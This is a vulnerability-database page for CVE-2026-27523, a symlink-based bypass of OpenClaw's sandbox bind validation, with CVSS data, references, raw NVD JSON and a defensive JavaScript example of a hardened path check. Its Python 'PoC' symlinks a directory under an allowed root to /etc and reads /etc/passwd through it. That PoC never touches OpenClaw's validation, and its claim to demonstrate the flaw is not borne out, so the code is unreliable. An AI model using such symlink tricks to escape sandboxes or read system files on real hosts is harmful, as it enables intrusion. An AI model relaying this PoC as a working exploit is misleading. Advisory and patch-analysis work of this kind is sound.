Security Vulnerability Report
CVE-2026-27523 CVSS 6.1 MEDIUM

CVE-2026-27523

Published: 2026-03-18 02:16:23
Last Modified: 2026-03-18 20:04:54

Description

OpenClaw versions prior to 2026.2.24 contain a sandbox bind validation vulnerability allowing attackers to bypass allowed-root and blocked-path checks via symlinked parent directories with non-existent leaf paths. Attackers can craft bind source paths that appear within allowed roots but resolve outside sandbox boundaries once missing leaf components are created, weakening bind-source isolation enforcement.
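The check the description implies, as an added example (not OpenClaw's code and not taken from its patch): `naiveCheck` models, as an assumption, a validator that falls back to the lexical path when the leaf is missing, while `hardenedCheck` canonicalises the deepest existing ancestor before comparing against allowed roots and blocked paths. All function names and the temp-dir layout are constructed for illustration.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// True when p equals root or lies beneath it (both already canonical).
function isInside(p, root) {
  const rel = path.relative(root, p);
  return rel === '' || (rel !== '..' && !rel.startsWith('..' + path.sep) && !path.isAbsolute(rel));
}

// Modelled weak check (assumption): lexical fallback when realpath fails on a missing leaf.
function naiveCheck(source, allowedRoots) {
  let candidate;
  try { candidate = fs.realpathSync(source); } catch { candidate = path.resolve(source); }
  return allowedRoots.some((r) => isInside(candidate, fs.realpathSync(r)));
}

// Canonicalise the deepest existing ancestor, then re-attach the missing tail.
function resolveViaExistingAncestor(source) {
  let head = path.resolve(source);
  const tail = [];
  while (!fs.lstatSync(head, { throwIfNoEntry: false })) {
    tail.unshift(path.basename(head));
    head = path.dirname(head);
  }
  return path.join(fs.realpathSync(head), ...tail); // throws on a dangling symlink
}

// Accept only if the canonical path is under an allowed root and under no blocked path.
function hardenedCheck(source, allowedRoots, blockedPaths = []) {
  let resolved;
  try { resolved = resolveViaExistingAncestor(source); } catch { return false; }
  if (blockedPaths.some((b) => isInside(resolved, fs.realpathSync(b)))) return false;
  return allowedRoots.some((r) => isInside(resolved, fs.realpathSync(r)));
}

// Constructed layout in a temp dir: allowed/link -> outside, with the leaf missing.
function demo() {
  const base = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'bind-')));
  const allowed = path.join(base, 'allowed');
  fs.mkdirSync(path.join(allowed, 'ok'), { recursive: true });
  fs.mkdirSync(path.join(base, 'outside'));
  fs.symlinkSync(path.join(base, 'outside'), path.join(allowed, 'link'));
  const crafted = path.join(allowed, 'link', 'missing-leaf');
  const benign = path.join(allowed, 'ok', 'missing-leaf');
  const result = { naive: naiveCheck(crafted, [allowed]), hardened: hardenedCheck(crafted, [allowed]),
    benign: hardenedCheck(benign, [allowed]), blocked: hardenedCheck(benign, [allowed], [path.join(allowed, 'ok')]) };
  fs.rmSync(base, { recursive: true, force: true });
  return result;
}
```

`path.resolve` collapses `..` segments lexically, so a caller should reject sources containing them before validation. The bind should then be performed on the canonical path that was checked, not on the original string, so that later changes to the directory tree cannot redirect it.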

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-27523 PoC - OpenClaw Sandbox Bind Validation Bypass
# Author: VulnCheck
import os


def create_symlink_attack():
    """
    Create symlink attack to bypass sandbox bind validation
    """
    # Step 1: Create a symlink pointing outside the allowed root
    # attacker-controlled-dir -> /etc (outside sandbox)
    symlink_path = "/allowed/root/attacker-controlled-dir"
    target_path = "/etc"

    if os.path.exists(os.path.dirname(symlink_path)):
        if os.path.islink(symlink_path):
            os.remove(symlink_path)
        os.symlink(target_path, symlink_path)
        print(f"[+] Created symlink: {symlink_path} -> {target_path}")

    # Step 2: Create bind mount with non-existent leaf path
    # Path appears to be within allowed root during validation
    # /allowed/root/attacker-controlled-dir/missing-leaf
    fake_path = "/allowed/root/attacker-controlled-dir/missing-leaf"

    # Step 3: After validation, create the missing leaf component
    # This triggers symlink resolution, exposing /etc
    try:
        os.makedirs(fake_path, exist_ok=True)
        print(f"[+] Created missing leaf path: {fake_path}")
        print("[*] Symlink resolved, /etc is now accessible within sandbox")
    except Exception as e:
        print(f"[-] Error: {e}")


def verify_bypass():
    """
    Verify the sandbox bypass was successful
    """
    test_file = "/allowed/root/attacker-controlled-dir/passwd"
    if os.path.exists(test_file):
        print(f"[+] Bypass successful! Can access: {test_file}")
        try:
            with open(test_file, 'r') as f:
                print(f"[+] Content preview: {f.read(100)}...")
        except OSError:
            # Unreadable file: existence alone already shows the path resolved
            pass


if __name__ == "__main__":
    print("CVE-2026-27523 OpenClaw Sandbox Bind Validation Bypass PoC")
    print("=" * 60)
    create_symlink_attack()
    verify_bypass()
```

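References

https://github.com/openclaw/openclaw/commit/b5787e4abba0dcc6baf09051099f6773c1679ec1 (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-m8v2-6wwh-r4gc (Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-sandbox-bind-validation-bypass-via-symlink-parent-missing-leaf-paths (Third Party Advisory)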

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27523", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:23.420", "lastModified": "2026-03-18T20:04:53.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.24 contain a sandbox bind validation vulnerability allowing attackers to bypass allowed-root and blocked-path checks via symlinked parent directories with non-existent leaf paths. Attackers can craft bind source paths that appear within allowed roots but resolve outside sandbox boundaries once missing leaf components are created, weakening bind-source isolation enforcement."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.24 contienen una vulnerabilidad de validación de enlace (bind) de sandbox que permite a los atacantes eludir las comprobaciones de raíces permitidas (allowed-root) y rutas bloqueadas (blocked-path) a través de directorios padre con enlaces simbólicos (symlinked parent directories) con rutas hoja (leaf paths) inexistentes. 
Los atacantes pueden crear rutas de origen de enlace (bind source paths) que parecen estar dentro de raíces permitidas pero se resuelven fuera de los límites del sandbox una vez que se crean los componentes hoja (leaf components) que faltan, debilitando la aplicación del aislamiento de origen de enlace (bind-source isolation enforcement)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.24", "matchCriteriaId": "673E4DE2-44C4-485D-8BDF-6DEEB32C1A98"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/b5787e4abba0dcc6baf09051099f6773c1679ec1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m8v2-6wwh-r4gc", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bind-validation-bypass-via-symlink-parent-missing-leaf-paths", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}